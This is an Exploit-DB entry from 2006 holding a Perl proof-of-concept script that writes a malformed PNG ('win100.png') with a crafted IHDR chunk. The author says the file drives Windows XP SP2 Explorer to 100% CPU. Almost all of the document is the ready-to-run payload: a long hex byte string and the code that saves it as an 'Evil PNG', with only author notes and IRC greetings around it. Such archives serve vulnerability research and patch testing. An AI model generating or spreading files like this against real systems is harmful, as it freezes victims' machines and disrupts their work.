Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)

EDB-ID:

2194


Author:

Preddy

Type:

dos


Platform:

Windows

Date:

2006-08-16


#!/usr/bin/perl

##################################################################################
#Microsoft Windows PNG IHDR block DoS poc
#More info: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=6
#Written by Preddy
#
#don't create the poc png file on windows it won't work as it should
#when i create it on windows with activeperl or visual c
#the png header becomes: 89 50 4e 47 0d 0d
#instead of            : 89 50 4e 47 0d 0a
#
#I currently have no single idea WHY it does that...
#so use linux to compile/run the script or the program
#
#http://www.team-rootshell.com
#
#Greetz to all of my friends at:
#
#FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
#MILW0RM(ABS.lcirc.net): #milw0rm
#STS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal <3<3<3)
#PTP(irc.eu.pulltheplug.org): #aso,#Social
#GSO(gso.eclipticx.net): #gso-chat
#TTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php
#SSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan
#xoron,sakkkure :D
#Rootshell Security Group and everyone else ^^
#
#This causes 100% cpu  tested on WinXp Sp2
#Cpu will keep running at 100% untill you close explorer.exe
#
##################################################################################

$file = 'win100.png';

$png =
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52".
"\x00\x00\xff\xff\x00\x00\xff\xff\x08\x00\x00\x00\x00\xc3\x07\xf1".
"\x5c\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xd6\x02\x0e\x0f\x25\x12".
"\x82\xba\x97\x53\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0a\xf0".
"\x00\x00\x0a\xf0\x01\x42\xac\x34\x98\x00\x00\x00\x04\x67\x41\x4d".
"\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x09\x4d\x49\x44\x41".
"\x54\x78\xda\xcd\x9d\x41\x6c\x1b\x45\x14\x40\x27\xff\x00\x00\x00".
"\xff\x00\xff\x00\x00\x00\x00\xff\xff\x00\xff\x00\xff\xff\xff\xff".
"\xff\xc8\xa8\xbd\x94\x0a\xc9\x2d\x1c\x20\x70\x71\x7a\xff\xff\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x4d\x0e\x75\x55\x55".
"\x4a\x72\x31\x6a\x39\xd8\x85\x83\x5b\x09\xd2\x14\x55\xc8\x2b\xa1".
"\x26\x15\x48\xd8\x16\x12\x69\x00\x01\x2a\x62\x59\xef\x7a\xd7\x5e".
"\x7b\x76\xfe\xff\x33\x63\x36\xff\x14\x7b\xff\xee\x3e\xff\x99\xff".
"\xe7\xcf\xcc\xdf\xcd\x98\xcd\x02\xf9\xe7\xc7\xdf\xd8\x36\x91\xc7".
"\x8c\x9d\xbd\x0f\xc1\x9f\xf6\xf7\xe5\xef\xbe\xf9\x3d\x6e\xb6\x80".
"\xf1\xe9\x97\x5e\x7d\x22\xf8\x64\xbb\xf2\xc7\xd7\xef\x3c\xa1\x70".
"\xc9\x11\xc8\xd8\xfe\x53\x77\x1e\x78\x70\x1e\xe3\x0f\x47\x1f\x8d".
"\x9b\x89\x23\x8f\xbf\xbb\xd5\x63\xfc\xe1\x85\xb8\x71\xf8\xb2\xe3".
"\xe4\x96\xcf\xb8\x5d\x11\x7d\x48\x87\xf1\xef\xd7\xe3\x46\x11\x40".
"\xce\x7b\x8c\xd5\xed\xd8\x17\x7d\xd9\xff\x73\x87\xf1\xdf\xb7\xa3".
"\x8e\x1b\x99\xb8\x09\x9d\xd8\x78\xb1\xc3\x78\x27\x32\xe8\x64\xec".
"\x7a\x36\x6e\x46\x36\x75\xdf\x61\xfc\x30\xf2\x70\xc6\xe9\x0b\x8d".
"\x9c\x11\x2f\xe3\xae\xaa\xcd\xfe\x8c\x76\xea\x8c\x1b\x9d\xe2\xb6".
"\x65\xc1\x66\x5b\x07\x22\x8f\x26\xbd\x30\x6f\x57\x92\x71\x32\xbe".
"\xf0\xa7\x88\xd1\xb4\x7d\x29\x9a\xf1\x31\x1e\xd8\x7a\x08\xa5\x37".
"\x7b\x3d\x3f\xaa\x6e\x99\x2c\xe4\x40\x1d\x81\x1d\x59\xd3\xee\x49".
"\x63\x24\xdd\x32\x5b\x6f\xda\x15\xb1\xca\x81\x2d\x34\xa3\xd3\x2d".
"\xb5\x37\x78\xb6\xee\x3a\xa5\x12\x63\x23\xc4\x68\x37\x0b\x5a\x1b".
"\x3c\x59\xee\xb6\x90\x12\x63\xd9\x1e\x90\xba\x46\x0f\xcf\xfb\xad".
"\xd4\x10\xff\x72\xc0\x67\x36\x07\xbf\x48\xdd\x28\x6a\x32\xa5\x59".
"\x39\x93\xe8\xfe\xb9\x17\x54\x16\xd9\x31\x6b\x0f\x4b\x43\x8b\x29".
"\x33\x7d\xdd\xa8\x29\xee\xe7\x80\x1d\xef\xf1\x0c\xb0\x92\x57\x47".
"\xcc\x5d\x25\xf9\x9f\xc8\x8e\x46\xc3\xe6\x49\x59\xb1\xbd\x8d\x62".
"\xd8\x15\x95\xec\xd8\xae\x72\xbf\x3e\xf1\x95\x5a\xd2\x76\x6e\x96".
"\xa6\x2f\x1e\x67\xd6\xf8\x5f\x9b\x8b\x2a\xed\x5d\x3e\x41\x3d\x43".
"\xd4\xd6\xcc\x68\xda\x11\x52\x91\x6d\x6f\x63\x28\xa0\xa9\xb5\x35".
"\x6b\xaf\x46\x1d\x39\x2c\xdb\xde\xe7\xc8\x56\x04\xda\x9a\x95\x22".
"\x8f\x98\x8b\x70\x2e\xc0\x91\x02\x1d\x11\x68\xeb\xc1\x21\x5b\xd9".
"\xbf\x73\x9c\xcb\x28\xb6\x35\x63\x4b\x82\x63\x27\x56\xa8\xf1\x3c".
"\xf3\x81\x84\x15\x41\x3b\x9a\x22\x43\xda\x4d\x5a\xa7\xe4\xc7\x5b".
"\x65\x3b\x5a\xab\xa2\xa3\x89\xab\xa4\x20\x54\xe2\xd3\xfc\xaa\x68".
"\x47\x96\x14\x1a\xd2\x99\x46\xe0\x3b\x65\x9e\x7f\x05\x30\xef\x01".
"\x19\x87\x13\x34\x59\xcf\x89\xea\x36\x6a\xf9\xa3\xf0\xd2\x81\xd4".
"\x91\x90\x75\x5b\x92\x11\x9e\x73\x59\x17\x00\x85\xd4\x0a\x2a\x89".
"\xc9\xa5\x22\x0e\x80\xdd\x11\xb6\x63\x54\xf6\xd3\x6f\x09\x04\x64".
"\xf4\x55\xca\xea\x76\x64\xed\x37\x5b\x80\x86\x79\x1d\x0e\x94\x73".
"\x91\xbf\x63\x03\x3a\x15\x33\xbf\xbe\x39\x0f\x69\x24\x3e\x87\x20".
"\xcd\xb7\x22\x0f\x6d\x02\xa7\xa2\x18\xd9\xd9\x4b\x90\x86\xb9\x02".
"\x44\xf3\xf7\x12\x91\x87\x40\x46\x44\x7f\xec\x48\x05\xea\x92\xc0".
"\x90\x63\x08\xce\x04\x7e\x1d\x76\x2d\x85\xcd\x59\x90\x46\x62\x51".
"\x74\xaf\x39\xc1\xb1\x7b\x0c\x12\x9c\x1d\x83\x35\x34\x39\x4b\x0a".
"\x43\x03\x70\x67\xb4\x1d\xd9\xcd\xe3\xa0\x4a\xe2\x6a\x24\x64\x5a".
"\x10\x9c\xa0\xa0\x81\xf4\x99\x8e\x5c\x3e\x05\xeb\x2c\x46\xad\x5b".
"\x1d\x12\x9c\xb4\xae\x8f\x91\x9d\x3d\x0f\xaa\x24\x3e\xe6\x87\x20".
"\x23\x2d\x38\x09\x1e\x66\xf0\x8c\xec\xe4\x17\x30\x24\x7f\x58\x1c".
"\x4f\x09\xce\xb9\xad\x93\x91\xcd\xc8\x42\xee\x13\x9d\xb2\xa1\x95".
"\xb1\x3d\x73\x03\xd4\x31\x79\x90\xd3\xa2\x33\x74\xf6\xc7\x0e\xe4".
"\x51\x30\x4c\x32\xb3\x34\x9c\xaa\x1d\x14\x9d\x00\x87\x47\x12\xa3".
"\x03\x09\x5b\x32\x35\x0c\xf9\x94\x40\xdd\xd2\xea\x33\xee\x15\x11".
"\xcd\x7d\xf8\xdc\xe0\x37\xa2\x15\xc6\x5f\xdb\xba\x19\x99\x75\x14".
"\x76\x9c\x13\xc5\xf0\x67\x23\x21\x50\x5e\x63\xa0\x50\x19\x1d\xc7".
"\x01\x93\x20\x36\x1b\x5e\xc2\x98\x10\xe9\x6e\x8c\x80\x91\xb5\x5f".
"\x83\x47\x9c\x0f\x42\xa3\xe2\x1e\x91\xea\xad\x51\x30\x3a\x23\xce".
"\xcb\x90\x7b\x27\x16\xfb\x23\x90\xc8\x8e\x2d\xd8\xad\xa5\x18\xd9".
"\x35\xb0\x53\x26\x4a\xc8\x4b\xad\xc3\xd1\x4c\x8e\x91\x59\x47\x4e".
"\x01\xe9\x4a\xaa\x88\xbb\x52\x0d\xa1\x23\xc7\xe8\xb4\x37\x64\xca".
"\x3e\xbf\x11\x85\x9e\x65\xcc\xcd\x90\x39\x2e\x47\x72\xe2\x39\x6d".
"\x33\xc8\x81\x8a\xd1\x4a\x0d\xf8\x36\xf8\x1c\x97\x23\x0b\xcf\x0b".
"\x1b\x3c\xf1\x91\x3f\xde\x08\xec\x08\xad\x2f\xa8\xda\x91\x75\x76".
"\x31\x44\x0b\x2d\x7e\x97\x8c\x5e\x31\x6a\x22\x16\x0f\x30\xeb\x3d".
"\x62\x49\x8a\x96\xac\xba\x5d\x32\x7a\x52\x59\x41\xdc\x41\x9d\xd1".
"\xa1\x8c\x46\xe8\x76\xc9\x68\x05\xcc\x12\xab\x0e\x46\xc6\x32\x91".
"\x10\xde\xd2\x62\xe4\x61\x8c\x19\x35\x31\x0a\x28\xcb\x42\x46\xd4".
"\x72\xba\x2e\xc6\x68\xca\x9c\x80\x11\x17\xe6\xf5\x31\x3a\x94\x65".
"\x9e\x8f\x77\x3c\x37\xc2\xad\x1a\xb8\xb5\x55\x9d\x8c\x8e\xf7\xf0".
"\x22\x51\x25\x92\x11\x59\x44\xa2\x97\xd1\x99\xcc\x14\x9a\x1c\x14".
"\x7e\x5b\x23\x07\x74\xed\x8c\x4e\x54\xcf\x0f\x8e\x90\x8d\x3c\x37".
"\xce\x23\x5b\x5a\x71\x2c\xe4\x22\x4e\xac\x5f\x18\x18\x20\xcd\x33".
"\xbc\xa9\x42\xeb\x4d\x78\x1e\xe3\xcb\x4e\xb4\x26\x48\x37\xf9\x64".
"\x7a\x7c\x6f\x02\xa9\xfe\xfe\x4d\xfc\xa5\xb5\x30\x1a\x93\xd3\x07".
"\x9f\xc1\xd2\xb9\x72\x6a\x81\xa0\xac\xce\x68\xa6\xd3\xd3\x24\x3e".
"\x47\xce\x9f\x25\xa9\x2b\xfa\x4c\xa6\x02\x6d\x31\x29\xb8\xb4\x2b".
"\x8a\x7e\x6d\xe4\xea\x74\x40\xea\xbe\xb7\x1a\x63\x0e\xdc\x5c\x52".
"\xb7\xa2\x1a\x63\x46\x8e\xb0\x49\x2d\x69\x91\x67\x34\x8a\x52\x84".
"\x41\xde\x4b\x61\x94\xf4\xeb\xe4\x47\x29\xb9\x13\xd9\x93\x12\xe7".
"\x48\xd9\x31\x23\xe1\xcc\xbe\xfc\x4f\x6d\x9d\x53\x40\xb4\x9b\xc4".
"\xa2\x59\x39\xc6\x9c\x02\xa1\x8d\x9b\x0c\x86\x18\x25\x72\x8a\x2c".
"\xbc\x09\x22\x94\x44\x89\x58\x17\x44\xf7\x99\xcc\xc7\xe1\xcf\xd6".
"\xad\x8d\xbd\x93\x24\x0f\x4a\xcd\x9d\xa6\xdd\x92\xda\xd6\x03\x5b".
"\x7f\x4d\xef\x79\x86\x2c\xad\x87\x52\xca\x82\x24\xfa\x63\x38\xa9".
"\x0e\xf6\x31\x4d\xd2\xa8\x58\x27\xdc\x90\xce\x38\x50\xa3\xd3\x1b".
"\xd7\x10\x1b\xb3\x7d\x42\x88\xe4\x64\xc6\xc1\x42\x9a\xbe\x38\x02".
"\x6f\xc3\xf7\x09\x7a\xa6\x20\xe1\xd7\xf3\x03\x99\x62\x5f\x9d\xc1".
"\x75\xd2\x6f\x3d\x46\x50\xa6\x31\x66\x0e\x0f\x7c\x31\x41\x3a\xbd".
"\x4f\x66\x08\xf1\x87\xc6\xf8\xde\xd0\xad\x7a\x7f\x4e\x92\xae\x94".
"\xa2\xa8\x53\xfa\x63\x66\xb8\x63\x05\xa3\x2f\xcd\x67\xc0\xca\xa3".
"\x9e\x10\x7d\x86\xb7\xe0\xd0\x7d\xb0\x26\x49\xcd\x26\x9b\xf8\xf9".
"\x35\x65\x9c\x31\x78\x7b\xbc\x67\x5e\x59\xae\xb1\x7d\xd3\xc7\xa8".
"\xd3\xae\xc4\xe4\x35\xac\x2a\x85\x31\xcd\xe5\x48\x49\x66\x92\xd3".
"\x68\x46\x8a\xcf\x4c\x13\x74\x61\xc1\x47\x1f\x0a\xe3\x3e\x82\x2e".
"\x2c\x7b\xd1\x29\x1a\x85\xf1\x19\xad\x8c\x89\x83\x58\x4d\x0a\x23".
"\xd5\x2d\x00\x19\x1f\x05\xa3\x66\x49\x8f\x82\x11\xae\xba\x22\xc9".
"\x1e\xac\x22\x85\x71\x95\xa0\x8b\x90\x71\x6c\x14\xa7\x30\x22\xb6".
"\xc3\x49\x8c\x58\x45\x0a\x63\x95\xa0\xab\x53\x28\x8c\x35\xcd\x1d".
"\x72\x14\x8c\x6d\xdc\x4e\x2e\x56\xe0\xe7\x0a\x25\x18\x59\x29\x1e".
"\x43\x92\x18\x2d\xb0\x08\x9b\x22\x70\x3d\xb3\x0c\x23\x3b\x0b\x57".
"\x72\x8d\x40\x88\xe3\xcc\x4c\x1c\xad\x4d\xad\x89\x7b\x43\x1f\x24".
"\xa2\x1a\x4e\x8a\x91\x5d\xd3\x07\xb9\x81\x55\x24\xe7\x14\xd7\xde".
"\x40\x54\x36\xa1\x64\x44\x3e\xe3\x42\x22\xaa\x0b\x51\xb2\x31\x3a".
"\x46\x66\xcd\x9c\xd1\xd2\xde\x70\x21\xae\x3c\x23\x6b\x9f\xd6\x61".
"\x4a\x4c\xc5\x9e\x3c\x23\x63\x37\x8f\xcc\x2a\xf7\xca\xcd\x91\xda".
"\xb1\x23\x0b\xcf\xcf\x2a\x36\x38\x3a\xf4\xc8\xcf\x15\xda\x0b\x07".
"\x66\x95\x46\x9d\x1a\x5a\x53\x61\x3e\xd3\x5e\x78\xf6\xe5\x4b\xf2".
"\xc6\x44\x14\xb9\xfa\xa2\xb8\x37\x6c\xe4\xca\x92\x9b\x35\xf8\xf5".
"\x1e\x0d\x35\x1f\x46\x56\x06\x13\x51\xf9\xa8\x91\xb1\x83\x49\xdf".
"\xc7\x46\xef\x10\x6b\xab\x4b\xa1\xaf\xe7\x12\x26\x47\x7a\x18\xd3".
"\xe4\x25\x8c\x56\xed\xff\x66\xa4\xac\xc0\x7b\xb2\x8a\x2f\xef\xd1".
"\xc4\x78\x88\x7c\x46\x89\xa0\xab\x85\xd1\x44\x4f\xf1\x7c\x39\x7f".
"\x99\xa0\xac\xad\x4e\x8a\x22\xd6\x12\x69\x53\x73\x64\x8c\x37\x58".
"\xc4\x1a\xb4\x55\x5d\x5a\x23\x74\xc6\x91\x31\x5a\x4b\x25\x2b\xc9".
"\x1b\xcd\xad\x6a\x89\x50\x68\x36\x3a\xc6\x56\x75\xa9\xc6\x35\x14".
"\xdd\x82\x1a\x19\xad\xf5\x5e\x7c\x6c\x5d\x28\x79\xa9\xe5\xc0\xf2".
"\xa2\x63\xc1\x75\x19\x40\x35\xc6\x0c\x0b\xac\xb2\xdc\xed\x7b\xad".
"\xd5\x52\x60\xc2\xbe\xa1\xa7\xb5\xb9\xb4\x4c\x6f\xe2\x9e\xc8\x8f".
"\xd7\x0d\xbb\xe1\xbf\x3d\xce\x7b\xeb\x5d\xa3\xe0\x16\x53\x9b\x59".
"\xf7\xdb\x82\xbf\xa1\x55\xc9\x2b\xbd\x82\x4a\x29\xa7\xe8\x24\x3b".
"\x3e\x65\xd1\xb6\xeb\x5e\xd5\x42\xa7\xbc\x39\x1b\x30\x36\x8a\xca".
"\xef\x66\x54\x61\xec\x3e\x9a\xee\x15\x54\x18\x79\x77\xb7\xc5\xf4".
"\xaa\x71\xdd\x8d\x4e\x33\x97\x4d\x0e\xf1\x19\x66\x26\x5f\xac\xd7".
"\x29\x65\x71\xca\x76\x74\x6d\xe5\x17\x03\x04\xb5\xd7\x5c\x04\xc3".
"\xcc\x16\x2a\x8d\xae\x06\xa1\xe8\x43\x83\x1d\x3b\x52\xcf\x84\x6b".
"\x21\x87\xf6\x7d\x8d\x64\x3e\xc0\x73\x85\x54\x4f\xa1\x25\xf6\xa4".
"\xae\xb6\xd6\x27\xfa\xd2\xb3\x50\xd8\xe1\x16\xeb\xd6\x28\x97\x97".
"\x67\x0c\x05\xbb\x44\x08\x22\x78\xbe\xd5\x98\x3c\x34\xc5\x29\x26".
"\x6e\xcd\x93\x66\xe7\x0a\x76\xb4\x22\x37\x25\xbd\x03\xc6\x5c\x7a".
"\x82\x93\xfb\x5a\xb7\x6a\x35\xda\x02\xc2\x68\xc6\x6b\xc3\x31\xb2".
"\xb1\x32\x98\x54\xb4\x36\xef\xde\xae\xde\xa3\x2f\x70\x28\x30\x0a".
"\x1e\x4a\x9e\x70\x18\xc7\x43\x73\x1c\xeb\xee\xed\x5b\xb7\xf1\x4b".
"\x13\xba\x18\xd7\xfa\xed\xd4\x0a\xed\xca\xee\xe9\xff\x09\x2a\x78".
"\xca\x8c\x01\xdf\x92\x93\x70\x19\xe9\xb9\x1e\x73\x27\x2f\x6f\x57".
"\xa7\x37\xef\xde\x5b\x5b\x97\x4a\x75\xc2\x22\x1f\xc3\xbb\xaf\xa6".
"\xad\xfb\xa3\x9d\xd1\x7b\xc0\xc3\xab\xa8\xd1\xf3\x3a\x4b\xa5\x71".
"\xc6\x9d\xf8\xd7\xfb\x47\x8c\xa4\x1f\xc6\x0b\x5a\xe8\x34\x30\xb2".
"\x6c\xb3\x3c\x90\xd1\xf8\x15\xd9\x3a\x19\x8f\x3d\x60\x0f\xe8\x73".
"\xe3\x1e\xd2\xf0\x57\x5e\x39\xb1\x4e\xc6\x4f\x6d\x66\x7f\x36\xa6".
"\xf1\x82\xdd\x47\x22\x35\x32\x8e\x7f\xeb\x30\xfe\xb4\x5f\x2b\xa3".
"\x9b\x4b\x4a\xbd\xd2\x90\x2f\xc7\xff\xee\xbc\x2b\x1e\xf1\x42\x19".
"\x9a\x64\xb1\x6f\x3c\x43\xc8\xae\x2f\xdd\xf7\xd9\xdf\xd9\x66\xff".
"\xfd\x21\x24\x53\xf7\x5d\xc6\x7f\x4f\xef\x88\x9b\x24\x52\x76\x5f".
"\xb1\xbd\xff\xaf\xb0\x75\x72\xbb\x42\xee\xfe\xe4\x9f\x2e\xe3\xb6".
"\x85\xf4\x10\xbb\xff\xef\x63\x6b\x7e\x7f\x2c\x8b\x53\x42\x79\x78".
"\xea\x8a\x8b\xd8\x65\xb4\xed\x9f\x2f\x4e\xed\x8a\x1b\x2a\x24\xe3".
"\xc7\x97\xef\x77\xd9\xc6\x82\x57\x77\x6d\xad\xde\xf8\xf2\x97\xb8".
"\xc9\x7c\xd9\xf7\xdc\x8b\x4f\x3f\xec\x7f\x18\xeb\x7f\xbd\xd8\x5f".
"\x0f\xe2\x66\xf3\xe5\x91\xfe\xae\xf7\x1f\x3a\x53\xb1\x09\xdd\xaf".
"\x0e\xba\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\x00";

open(PNG,">$file");

print "Creating Evil PNG...\n";
print PNG $png;
print "Evil PNG Created...\n";
close(PNG);

print "Cya around,\nPreddy";

# milw0rm.com [2006-08-16]